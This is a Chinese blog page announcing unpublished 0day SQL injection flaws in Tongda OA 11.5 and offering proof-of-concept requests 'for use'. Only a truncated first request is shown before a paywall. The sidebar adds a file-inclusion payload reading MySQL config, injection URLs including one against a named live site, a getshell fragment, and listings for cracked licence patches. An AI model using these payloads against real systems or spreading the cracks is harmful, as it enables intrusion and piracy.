通达 php解密,全网首发 | 通达OA多枚0day漏洞分享

最新推荐文章于 2024-06-26 16:21:19 发布
最新推荐文章于 2024-06-26 16:21:19 发布
阅读量862 收藏
点赞数 1
文章标签: 通达 php解密
本文揭示了通达OA 11.5版本中存在的多个未公开0day SQL注入漏洞,包括get_callist_data、get_sentbox_data、get_email_data和RepdetailController.php等函数中的注入问题。每个漏洞的POC和受影响的文件已给出,大部分漏洞只需普通账号权限即可利用,部分低版本甚至无需登录。
摘要由CSDN通过智能技术生成

format,png

之前曝光过通达OA 0day我这里就不曝了,截止到发帖时,下面的漏洞都是未正式公开的。

影响范围:

我测试的是通达OA11.5版本,也就是2020年04月17日发布的,其他版未测,但我想也会有吧。

format,png

HW这几天看到大家对通达OA的热情度很高,正好今天有空,下载了一个通达OA 11.5版本下来做代码审计,通达OA的代码是加密的,所以需要一个SeayDzend工具解密,百度上就能找到。

format,png

解密后,对代码的各个模块都大致看了一下,很快就发现多处都存在SQL注入漏洞,仔细看了之前的曝光的文章,发现这些漏洞并未曝光,也未预警,也属于0day漏洞吧。

不多说,直接上POC,有需要的可以先拿到用了。

0x001 SQL注入 POC:POST /general/appbuilder/web/calendar/calendarlist/getcallist HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36Referer: http://192.168.202.1/portal/home/Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ffConnection: keep-aliveHost: 1

最低0.47元/天 解锁文章
weixin_39702335
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
通达oa 2013 php解密,通达OA漏洞学习 - 安全先师的个人空间 - OSCHINA - 中文开源技术交流社区...
weixin_39870238的博客
03-18 936
说明通达OA漏洞在去年上半年已爆出,这不趁着周末没事做,将源码下载下来进行复现学习。文件包含测试文件包含检测,payload1:ip/ispirit/interface/gateway.php?json={"url":"/general/../../mysql5/my.ini"}利用文件包含访问mysql.ini,检查是否有某些特定字符串 ,比如innodb_log_group_home_dir...
通达 oa 2010 php 源代码 解密
11-03
通达OA2010版本,完整general目录下php文件无加密,示例: <?php /*********************/ /* */ /* Version : 5.1.0 */ /* Author : RM */ /* Comment : 071223 */ /* */ /*********************/ include_once( "inc/auth.php" ); if ( $LOGIN_THEME != "10" ) { $query = "SELECT * from INTERFACE"; $cursor = exequery( $connection, $query ); if ( $ROW = mysql_fetch_array( $cursor ) ) { $IE_TITLE = $ROW['IE_TITLE']; } echo "<html>\r\n<head>\r\n<title>"; echo $IE_TITLE; echo "</title>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\">\r\n[removed][removed]\r\n[removed]\r\nself.moveTo(0,0);\r\nself.resizeTo(screen.availWidth,screen.availHeight);\r\nself.focus();\r\n\r\nrelogin=0;\r\nfunction exit()\r\n{\r\n if(document.body.clientWidth-event.clientX<50||event.altKey||event.ctrlKey)\r\n {\r\n"; if ( $ISPIRIT == 1 ) { echo "return;"; } echo " var req = new_req();\r\n\treq.open(\"GET\", \"relogin.php\", true);\r\n\treq.send('');\r\n }\r\n}\r\n\r\n[removed]\r\n</head>\r\n"; include_once( "inc/antivirus.txt" ); echo "<frameset rows=\"50,*,20\" cols=\"*\" frameborder=\"no\" border=\"0\" framespacing=\"0\" id=\"frame1\" <frame name=\"banner\" id=\"banner\" scrolling=\"no\" noresize=\"noresize\" src=\"topbar.php\" frameborder=\"0\">\r\n <frameset rows=\"*\" cols=\"200,*\" frameborder=\"no\" border=\"0\" framespacing=\"0\" id=\"frame2\">\r\n <frame name=\"leftmenu\" id=\"leftmenu\" scrolling=\"no\" noresize=\"noresize\" src=\"ipanel\" frameborder=\"0\">\r\n <frame name=\"table_index\" id=\"table_index\" scrolling=\"no\" src=\"table.php\" frameborder=\"0\">\r\n </frameset>\r\n <frame name=\"status_bar\" id=\"status_bar\" scrolling=\"no\" noresize=\"noresize\" src=\"status_bar\" frameborder=\"0\">\r\n</frameset>\r\n</html>\r\n"; exit( ); } include_once( "inc/utility_all.php" ); include_once( "inc/td_core.php" ); include_once( "inc/chinese_date.php" ); include_once( "inc/sys_function_all.php" ); ob_end_clean( ); 本资源(仅供技术学习,版权归原公司所有)
漏洞概念_通达OA前台任意用户登录漏洞_详细漏洞知识点
最新发布
程序员六七的博客
06-26 503
本文由东塔网络安全学院学员---张同学 投稿。1 漏洞描述通达OA是一套使用比较广泛的办公系统。该漏洞因为使用uid作为身份标识,攻击者通过构造恶意请求
通达oa2015 php解密,通达OA /interface/auth.php SQL注入
weixin_36318586的博客
04-02 660
通达OA 两处注入点:```/interface/auth.php/general/score/flow/scoredate/result.php```主要原因还是由于宽字符导致的。MYSQL的字符集转换过程1. MySQL Server收到请求时将请求数据从character_set_client转换为character_set_connection;2. 进行内部操作前将请求数据从charac...
通达oa 2013 php解密,通达OA2013集团版SQL注入+root
weixin_36330238的博客
03-18 220
### 简要描述:dd### 详细说明:http://www.tongda2000.com/oa/group/试用登录http://www.day900.com/注入点:http://www.day900.com/general/workflow/list/getdata.php?TYPE=2&RUN_ID=&RUN_NAME=&FLOW_ID=all&TIME_O...
通达OA v11.8 getway.php 远程文件包含漏洞.md
09-07
通达OA漏洞合集
通达OA v2017 video_file.php 任意文件下载漏洞.md
09-07
通达OA漏洞合集
通达OA v11.5 swfupload_new.php SQL注入漏洞.md
09-07
通达OA漏洞合集
通达OA2017-10.16破解
10-13
通达OA2017破解补丁安装步骤: ============================= 1、到官网下载OA2017最新版服务端安装包、用户PC端办公精灵、手机端下载址:http://www.tongda2000.com/download/2017.php 2、安装OA服务端到电脑或服务器或云主机或VPS主机 3、安装完,在OA服务管理器(MYOA\BIN\monitor.exe)中关闭所有OA服务,并退出服务控制器monitor.exe。 4、替换补丁中bin和webroot里的文件。直接复制粘贴就可以。 5、到D:\MYOA\BIN目录运行monitor.exe 并启动OA所有服务 6、检查OA所有服务是否正常开启。 7、在OA服务端上打开浏览器,输入http://localhost按提示升级(如果设置了端口的,末尾加上:端口号) 如果未出现“开始升级”,请检查MYOA\webroot\attachment\update下是否有lock.txt,有测删掉后重新打开OA登录页面,点击开始升级!!! 8、登录OA后按F5刷新网页,并到【系统管理】=》【系统资源管理】=》【资源监控】=》【系统缓存数据】=》更新系统缓存数据。 9、系统管理--&a mp;gt;定时任务管理-->检查系统更新-->设置-->关闭系统更新!!!!这步一定要做!要仔细检查! 正式使用时删除演示数据 10、到【系统管理】=》【系统资源管理】=》【演示数据清理】=》根据需要全删除或只删除单位、部门、用户、工作流。然后做一次第8步刷新OA缓存。
PHP解密软件
12-19
PHP解密软件,可以支持各种版本的php解密,查看源代码不再难
通达OA注册机破解版
05-05
通达OA注册机破解版.已经破解接触所有功能,为了支持正版没有只有25人授权
通达OA2017-10.16.20180831破解补丁
10-08
通达OA2017安装步骤: ============================= 1、到官网下载OA2017最新版服务端安装包、用户PC端办公精灵、手机端下载址:http://www.tongda2000.com/download/2017.php 2、安装OA服务端到电脑或服务器或云主机或VPS主机 3、安装完,在OA服务管理器(MYOA\BIN\monitor.exe)中关闭所有OA服务,并退出服务控制器monitor.exe。 4、替换补丁中bin和webroot里的文件。直接复制粘贴就可以。 5、到D:\MYOA\BIN目录运行monitor.exe 并启动OA所有服务 6、检查OA所有服务是否正常开启。 7、在OA服务端上打开浏览器,输入http://localhost按提示升级(如果设置了端口的,末尾加上:端口号) 如果未出现“开始升级”,请检查MYOA\webroot\attachment\update下是否有lock.txt,有测删掉后重新打开OA登录页面,点击开始升级!!! 8、登录OA后按F5刷新网页,并到【系统管理】=》【系统资源管理】=》【资源监控】=》【系统缓存数据】=》更新系统缓存数据。 9、系统管理-->定时任务管理-->检查系统更新-->设置-->关闭系统更新!!!!这步一定要做!要仔细检查! 正式使用时删除演示数据 10、到【系统管理】=》【系统资源管理】=》【演示数据清理】=》根据需要全删除或只删除单位、部门、用户、工作流。然后做一次第8步刷新OA缓存。 ============================= =============================
通达OA2016破解补丁(9.5.160913)
11-07
通达OA2016破解补丁。 1、到官网下载OA2016最新版服务端安装包、用户PC端办公精灵、手机端下载址:http://www.tongda2000.com/download/2016.php 2、安装OA服务端到电脑或服务器或云主机或VPS主机 3、安装完,在OA服务管理器(MYOA\BIN\monitor.exe)中关闭所有OA服务,并退出服务控制器monitor.exe。 4、双加破解补丁.exe文件。 5、到D:\MYOA\BIN目录运行monitor.exe 并启动OA所有服务 6、检查OA所有服务是否正常开启。 7、在OA服务端上打开浏览器,输入http://localhost按提示升级(如果设置了端口的,末尾加上:端口号) 8、登录OA后按F5刷新网页,并到【系统管理】=》【系统资源管理】=》【系统缓存数据】=》更新系统缓存数据。 正式使用时删除演示数据 9、到【系统管理】=》【系统资源管理】=》【演示数据清理】=》根据需要全删除或只删除单位、部门、用户、工作流。然后做一次第9步即可刷新单位、部门信息,删除完数据按第9步刷新OA缓存。
uc.rar_PHP 解密_通达OA
09-24
在这个“uc.rar”压缩包中,我们主要关注的是“uc.php”,这是一个与PHP相关的解密文件,很可能涉及到通达OA系统的API接口实现。 PHP是一种广泛应用的开源脚本语言,尤其在Web开发领域占据着重要地位。解密PHP文件...
通达oa 2013 php解密,通达OA 2011-2013 通杀GETSHELL修复补丁
weixin_30320081的博客
03-18 218
此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.EXP:第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys...
通达OA2009完整破解版(含安装文件、补丁、破解手册)
04-14
通达OA2009完整破解版(含安装文件、补丁、破解手册),可以在线升级验证。无客户数限制(至少1000)。文件较大 包含3各部分。下全一起解压缩。经过多人验证,绝对真实可用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值